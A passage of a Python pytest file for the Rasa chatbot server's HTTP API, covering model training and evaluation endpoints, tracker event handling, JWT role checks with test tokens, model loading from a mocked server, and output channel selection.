default_domain_path: Text,
default_stack_config: Text,
default_nlu_data: Text,
tmp_path: Path,
):
payload = dict(
domain=Path(default_domain_path).read_text(),
config=Path(default_stack_config).read_text(),
stories=Path("data/test_stories/stories_defaultdomain.md").read_text(),
nlu=Path(default_nlu_data).read_text(),
)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.OK
assert response.headers["filename"] is not None
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
async def test_train_nlu_success(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_nlu_data: Text,
default_domain_path: Text,
tmp_path: Path,
):
domain_data = rasa.shared.utils.io.read_yaml_file(default_domain_path)
config_data = rasa.shared.utils.io.read_yaml_file(default_stack_config)
nlu_data = rasa.shared.utils.io.read_yaml_file(default_nlu_data)
# combine all data into our payload
payload = {
key: val for d in [domain_data, config_data, nlu_data] for key, val in d.items()
}
data = StringIO()
rasa.shared.utils.io.write_yaml(payload, data)
_, response = await rasa_app.post(
"/model/train",
data=data.getvalue(),
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
async def test_train_core_success_with(
rasa_app: SanicASGITestClient,
default_stack_config: Text,
default_stories_file: Text,
default_domain_path: Text,
tmp_path: Path,
):
payload = f"""
{Path(default_domain_path).read_text()}
{Path(default_stack_config).read_text()}
{Path(default_stories_file).read_text()}
"""
_, response = await rasa_app.post(
"/model/train",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
async def test_train_with_retrieval_events_success(
rasa_app: SanicASGITestClient, default_stack_config: Text, tmp_path: Path
):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.md"))
nlu_file = stack.enter_context(
open("data/test_nlu/default_retrieval_intents.md")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = await rasa_app.post("/model/train", json=payload, timeout=60 * 5)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
def assert_trained_model(response_body: bytes, tmp_path: Path) -> None:
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.parametrize(
"payload",
[
{"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"force": False,
"save_to_default_model_directory": True,
},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"save_to_default_model_directory": False,
},
],
)
def test_deprecation_warnings_json_payload(payload: Dict):
with pytest.warns(FutureWarning):
rasa.server._validate_json_training_payload(payload)
async def test_train_with_yaml(rasa_app: SanicASGITestClient, tmp_path: Path):
training_data = """
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- rule: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
language: en
policies:
- name: RulePolicy
pipeline:
- name: KeywordIntentClassifier
"""
_, response = await rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
async def test_train_with_invalid_yaml(rasa_app: SanicASGITestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = await rasa_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
headers: Dict, expected: bool, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
(
{"save_to_default_model_directory": True},
rasa.shared.constants.DEFAULT_MODELS_PATH,
),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("output")
assert payload.get("output") == expected
async def test_train_missing_config(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config=None)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_missing_training_data(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_train_internal_error(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_stories(
rasa_app: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app.post(
"/model/test/stories",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == HTTPStatus.CONFLICT
async def test_evaluate_stories_end_to_end(
rasa_app: SanicASGITestClient, end_to_end_test_story_file: Text
):
stories = rasa.shared.utils.io.read_file(end_to_end_test_story_file)
_, response = await rasa_app.post("/model/test/stories?e2e=true", data=stories,)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert js["actions"] != []
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
async def test_evaluate_intent(rasa_app: SanicASGITestClient, default_nlu_data: Text):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_intent_json(rasa_app: SanicASGITestClient):
nlu_data = rasa.shared.utils.io.read_file("data/test/demo-rasa-small.json")
_, response = await rasa_app.post(
"/model/test/intents",
json=nlu_data,
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents?model=invalid.tar.gz",
json={},
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents", headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
async def test_evaluate_intent_with_model_param(
rasa_app: SanicASGITestClient, trained_nlu_model: Text, default_nlu_data: Text
):
_, response = await rasa_app.get("/status")
previous_model_file = response.json()["model_file"]
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = await rasa_app.get("/status")
assert previous_model_file == response.json()["model_file"]
async def test_evaluate_intent_with_model_server(
rasa_app: SanicASGITestClient,
trained_rasa_model: Text,
default_nlu_data: Text,
tear_down_scheduler: None,
):
production_model_server_url = (
"https://example.com/webhooks/actions?model=production"
)
test_model_server_url = "https://example.com/webhooks/actions?model=test"
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
with aioresponses() as mocked:
# Mock retrieving the production model from the model server
mocked.get(
production_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "production"},
)
# Mock retrieving the test model from the model server
mocked.get(
test_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "test"},
)
agent_with_model_server = await load_agent(
model_server=EndpointConfig(production_model_server_url)
)
rasa_app.app.agent = agent_with_model_server
_, response = await rasa_app.post(
f"/model/test/intents?model={test_model_server_url}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
production_model_server = rasa_app.app.agent.model_server
# Assert that the model server URL for the test didn't override the production
# model server URL
assert production_model_server.url == production_model_server_url
# Assert the tests didn't break pulling the models
assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
async def test_cross_validation(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.OK
response_body = response.json()
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_md(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
payload = """
## intent: greet
- Hi
- Hello
"""
_, response = await rasa_app_nlu.post(
"/model/test/intents", data=payload, params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_cross_validation_with_callback_success(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
mocked_cross_validation = Mock(
return_value=(
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
)
)
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, mocked_cross_validation
)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
# Sleep to give event loop time to process things in the background
await asyncio.sleep(1)
mocked_cross_validation.assert_called_once()
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["data"]
response_body = json.loads(content)
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
async def test_cross_validation_with_callback_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, Mock(side_effect=ValueError())
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_callback_unexpected_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
async def raiseUnexpectedError() -> NoReturn:
raise ValueError()
monkeypatch.setattr(
rasa.server,
rasa.server._training_payload_from_yaml.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_predict(rasa_app: SanicASGITestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
}
}
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/conversations/madeupid/tracker")
content = response.json()
assert response.status == HTTPStatus.OK
assert content["paused"] is False
assert content["slots"] == {
"name": None,
REQUESTED_SLOT: None,
SESSION_START_METADATA_SLOT: None,
}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": 1,
"timestamp": 1514764800,
"action_text": None,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
"action_text": None,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json()
assert tracker is not None
assert len(tracker.get("events")) == 4
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
assert deserialized_events[:3] == session_start_sequence
assert deserialized_events[3] == event
assert deserialized_events[3].timestamp > time_before_adding_events
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is an initial session start sequence at the beginning
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
@pytest.mark.parametrize(
"params", ["?execute_side_effects=true&output_channel=callback", ""]
)
async def test_pushing_event_while_executing_side_effects(
rasa_server: Sanic, params: Text
):
input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
channel.register([input_channel], rasa_server, "/webhooks/")
rasa_app = rasa_server.asgi_client
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = test_events[1].as_dict()
with aioresponses() as mocked:
mocked.post(
"https://example.com/callback",
repeat=True,
headers={"Content-Type": "application/json"},
)
await rasa_app.post(
f"{conversation}/tracker/events{params}",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
r = latest_request(mocked, "post", "https://example.com/callback")
if not params:
assert r is None
else:
message_received = json_of_latest_request(r)
assert message_received.get("recipient_id") == sender_id
assert message_received.get("text") == serialized_event.get("text")
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
id_len = len(conversation_id) // 2
conversation_id = conversation_id[:id_len] + "/+-_\\=" + conversation_id[id_len:]
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is a session start sequence at the start
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
async def test_put_tracker(rasa_app: SanicASGITestClient):
data = [event.as_dict() for event in test_events]
_, response = await rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json()
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post("/conversations/non_existent_id/predict")
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
async def test_sorted_predict(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = await rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json()["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = await app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.FORBIDDEN
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
def test_list_routes(default_agent: Agent):
app = rasa.server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
async def test_unload_model_error(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "model_file" in response.json() and response.json()["model_file"] is not None
_, response = await rasa_app.delete("/model")
assert response.status == HTTPStatus.NO_CONTENT
async def test_get_domain(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/domain")
assert response.status == HTTPStatus.NOT_ACCEPTABLE
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
data = {"model_file": trained_core_model}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
async def test_load_model_from_model_server(
rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
async def test_load_model_invalid_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.put("/model")
assert response.status == HTTPStatus.BAD_REQUEST
async def test_load_model_invalid_configuration(rasa_app: SanicASGITestClient):
data = {"model_file": "some-random-path"}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post(
"/conversations/non_existent_id/execute", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_missing_action_name"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_not_existing_action"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
async def test_trigger_intent(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
(
[RestInput(), SlackInput("test", slack_signing_secret="foobar")],
"slack",
SlackBot,
),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
@pytest.mark.parametrize(
"conversation_events,until_time,fetch_all_sessions,expected",
# conversation with one session
[
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# conversation with multiple sessions
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID, story 1
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- story: some-conversation-ID, story 2
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# conversation with multiple sessions, but setting `all_sessions=false`
# means only the last one is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
False,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
